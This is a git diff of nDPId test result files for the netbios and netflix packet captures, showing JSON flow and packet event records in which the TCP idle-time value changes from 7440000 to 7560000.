00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":774,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1536719715232} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/774 diff --git a/test/results/netbios.pcap.out b/test/results/netbios.pcap.out index 3a2774b0e..f4a349feb 100644 --- a/test/results/netbios.pcap.out +++ b/test/results/netbios.pcap.out 
@@ -13,9 +13,9 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1447772214344,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772214344,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGUCABFAADlUKwAAIARylQKAAUJCgAF\/wCKAIoA0VBGEQ7C9AoABQkAigC7AAAgRU9GR0ZDREpDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoATlZSOQAAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} 00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772214344,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} 
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1447772216537,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1447772216537,"pkt":"ABj+bLz3ABzEEHkPCABFAAApQatAAIAGnIkKAAQYCgAEgwCLBXatXRk68Re6KFAQ96kjtgAAAAAAAAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1447772216537,"pkt":"ABzEEHkPABj+bLz3CABFAAAoY6dAAIAGeo4KAASDCgAEGAV2AIvxF7oorV0ZO1AQ+ycgOAAAAAAAAAAA"} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1447772221776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221776,"pkt":"ABzEEHkPACFislxDCABFAABOBFAAAH8RHeEKAAFXCgAEGOHsAIkAOqS0IKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -68,8 +68,8 @@ 00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1447772214344,"flow_last_seen":1447772214344,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.5.9","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1447772251795,"flow_last_seen":1447772251795,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57921,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1447772216537,"flow_last_seen":1447772216537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1447772269972,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.131","src_port":139,"dst_port":1398,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":260,"source":"netbios.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":260,"total-skipped-flows":0,"total-l4-data-len":13727,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":73,"global_ts_msec":1447772269972} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 260/260 diff --git a/test/results/netflix.pcap.out b/test/results/netflix.pcap.out index 403bcca00..27cfa7bee 100644 
--- a/test/results/netflix.pcap.out +++ b/test/results/netflix.pcap.out 
@@ -1,7 +1,7 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netflix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1484319030789} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319030789,"flow_last_seen":1484319030789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319030789,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319030789,"flow_last_seen":1484319030789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1484319030789,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.24.87.6","src_port":52929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1484319032865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032865,"pkt":"gCqoTGHM5JjWH70UCABFAABCVrgAAEARoJrAqAEHwKgBAclXADUALqX1KVYBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -14,58 +14,58 @@ 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1484319032884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1484319032884,"pkt":"5JjWH70UgCqoTGHMCABFAADS4UJAAEAR1X\/AqAEBwKgBBwA1y5QAvmn70IiBgAABAAgAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQABwAwAAQABAAAAAQAENkXM8cAMAAEAAQAAAAEABDQqmRbADAABAAEAAAABAAQ2RDCIwAwAAQABAAAAAQAENkQSPsAMAAEAAQAAAAEABDZGuZ3ADAABAAEAAAABAAQ0IoVtwAwAAQABAAAAAQAENpVZIsAMAAEAAQAAAAEABDaUWeg="} 
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
